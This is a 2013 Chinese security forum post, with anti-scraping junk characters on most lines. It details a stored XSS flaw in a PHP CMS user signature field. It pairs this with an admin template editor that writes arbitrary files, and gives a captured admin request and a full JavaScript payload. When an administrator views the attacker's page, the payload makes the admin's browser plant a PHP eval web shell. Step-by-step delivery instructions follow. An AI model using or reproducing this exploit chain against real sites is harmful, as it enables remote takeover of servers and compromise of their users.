|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
: \; Z8 X$ W( f+ t* D官网已经修补了,所以重新下了源码
) D2 t( Y- K9 G因为 后台登入 还需要认证码 所以 注入就没看了。
, a4 N1 t/ [3 E K! @& F4 j存在 xss; b |. U/ ^) z8 c; f7 @9 U9 f9 {
漏洞文件 user/member/skin_edit.php
8 f6 j) m" o. F本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
; ~/ d' g4 v; a( U
9 F! b* B0 t, T& O- n" C+ R) x</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>- x( b5 O( C9 w0 R) c
: e+ {* n4 d4 X' Z5 V2 [</textarea></td></tr># j( {5 j/ V, Z' g. `3 m2 Q( z
9 E: _+ m6 q7 Q" z/ V9 D* ~+ ~/ j: H user/do.php . q2 |/ d4 z& C6 k' z3 D" I
$ l. x' D8 q% E+ V$ }6 l& g4 w8 m5 ]! O/ ?
if($op=='zl'){ //资料1 O0 D+ t2 l4 }
2 Q3 t4 _8 f% W* a9 h
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
+ W( H: U$ h: b- @/ y exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));/ S7 ~, l4 c" P: M9 Z) R
1 s4 p4 U2 j/ r, g9 n+ k $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',6 N: ?+ I# K2 N! Y* u( p2 K
! H/ l/ r9 M1 @$ t" P+ ^5 F CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
4 W) R& o1 v0 ?3 R: x7 V4 R where CS_Name='".$cscms_name."'";
( J2 E8 T" O, \7 ^9 L2 q5 X 3 S8 p* C; N4 M" i, R2 ~
if($db->query($sql)){/ u* ^( N$ D9 T4 O" L
+ k' V! B0 d V7 ^$ h! H
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));' @. c) z# I# N9 ] b
1 Q( K0 J. _4 z# \" [0 o
}else{
0 i4 M' q0 y+ w+ G% C
9 \, V X& }0 z! k3 l exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
* `, Q* ]5 C: c H3 K* j ! K9 a$ U1 Y; l/ p: K4 \1 h0 v
}
- h6 u4 d9 T7 ~% [9 z. J$ K: U3 s5 u
6 I% Q5 K% X9 S
没有 过滤导致xss产生。
# z" Y- K9 z3 y: R4 h后台 看了下 很奇葩的是可以写任意格式文件。。% l: Y7 @$ ?- F* \- r: n- p
抓包。。
) ^$ E2 |5 t9 I0 c0 L6 @# I9 {7 P7 |' L- }! H2 C
% F2 F: m* q" C( K9 q$ V S2 B- k. W本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1) G/ y! `- I) G5 m1 J, [. O
1 E3 \9 c! B+ Z9 R' }Accept: text/html, application/xhtml+xml, */*
( ~' d, Z6 w0 k0 i0 h' A( Q( B & u# G u8 p) n9 E$ @
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php; Y8 [) l; c, x6 p
- ^$ ~* `7 A8 W7 I0 o; M; J8 QAccept-Language: zh-CN
7 v7 v: l: O4 X) |2 M; U6 c4 `
9 J' L1 ` b- u1 cUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
7 f2 l$ D+ z$ ], l) t - `3 ~5 n5 V+ ]& A
Content-Type: application/x-www-form-urlencoded
" i" k; N8 O7 H4 g2 o6 g
; k/ ^! Z) }, ]7 N6 v6 mAccept-Encoding: gzip, deflate
4 c b2 \* b. A! O [$ H% }7 Q. j
Host: 127.0.0.13 |6 l/ s3 G$ }' A
$ k, N" z1 K- Z' @5 OContent-Length: 387 E. n P+ m" W6 c
. e5 `- P- u$ A$ ?& b( e! u$ P
DNT: 1# C0 k0 D# f' x5 u3 P5 i( z- o( Q
% N; ?9 t2 a! P# Z( [7 ]* K. J
Connection: Keep-Alive2 o8 ?$ |& J) J S& m, p
: p3 r; r+ I; H
Cache-Control: no-cache
% T1 ?4 ?0 `' B
7 H/ U A' |. t: r: Z6 LCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655943 p5 l- M5 S( t% p& a7 Y0 `3 M
- }. V/ [. X4 j" L+ m5 V! y* e
0 u( {5 s4 o. Q% U8 E; Kname=aaa.php&content=%3Cs%3E%3Ca%25%3E" f) j7 ~3 C6 |( l* e8 _( v
6 Y4 j8 G; l ~
3 e% W# m$ _3 D1 ?3 O- o5 k* l
6 W# b" ~4 ]0 X0 ~# J, u
于是 构造js如下。
1 V L) n3 t* S) @, [& r: g9 x" L `! t& B" N. h0 v
本帖隐藏的内容<script>
( i8 \" F) {6 G: P( hthisTHost = top.location.hostname;5 Z# A P8 T, Y% x5 c& m
9 h$ B4 m' g" o) ]3 g. F- _thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";1 W# I) P, z. |* m0 C
0 Z$ p4 M+ e7 ~& _. m7 }function PostSubmit(url, data, msg) {
, f8 N4 }, \' E( F' b var postUrl = url;
1 b: g7 h. y+ J% m! |( C) u 4 @( o6 ?2 M- y; O- F
var postData = data; ) p# F, J- v9 K6 I
var msgData = msg;
( G8 M. G9 T3 a0 G var ExportForm = document.createElement("FORM");
( \( H7 a0 O6 h5 } document.body.appendChild(ExportForm);
: k' q3 ~* E7 U7 ? ExportForm.method = "POST";
# B. E, i7 f* {: O: i# s var newElement = document.createElement("input");
# e6 q) k, d% P: @3 Q/ r% o newElement.setAttribute("name", "name");
- H9 V: m2 z e! [; K% N newElement.setAttribute("type", "hidden");
' o& p: q3 T: d% {5 B- B$ h2 k var newElement2 = document.createElement("input");
1 B. b$ I A3 Y% W newElement2.setAttribute("name", "content");
( G3 k: @! }( G. F, k% A* R/ M newElement2.setAttribute("type", "hidden"); p2 d0 e. O4 \3 ^$ O
ExportForm.appendChild(newElement); ' b0 z! X0 o: ]5 {% `! u) U
ExportForm.appendChild(newElement2); 0 A/ M# j' k6 e7 h( G5 Z+ p
newElement.value = postData;
8 @9 ]% P8 m$ H% E# l newElement2.value = msgData;
. h' ^) d; a- Y; c0 w8 W; q, r2 C' \ ExportForm.action = postUrl;
6 x6 L E4 Q2 h7 T7 v6 l1 k, A* @. f ExportForm.submit(); 9 T5 r7 V/ u9 z# w n9 Q& T( o
};
+ {9 }5 d, W. I7 Y7 n0 v( a3 Z 8 S2 D+ R" r) p! [5 A1 u: D- D- @/ h! e
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
4 J: } e" ] @1 D" Z3 Y, t* A0 B/ A ) _- C! N* W( C, H6 w/ ?' C( ^; ?
</script>7 o$ X( G6 q0 ?4 h
# ~' W/ k& ^. B" J5 W, h9 {6 [$ V, K S
5 T! e i& ]0 N4 t6 f0 }2 ihttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入4 d) @2 ^9 r8 M% ~' T3 G3 h
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)) z! Z" n: ~5 `+ X. z
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
& s+ X1 h8 N& N) C% Y |
|
发表于 2013-11-6 18:09:37
收藏
支持
反对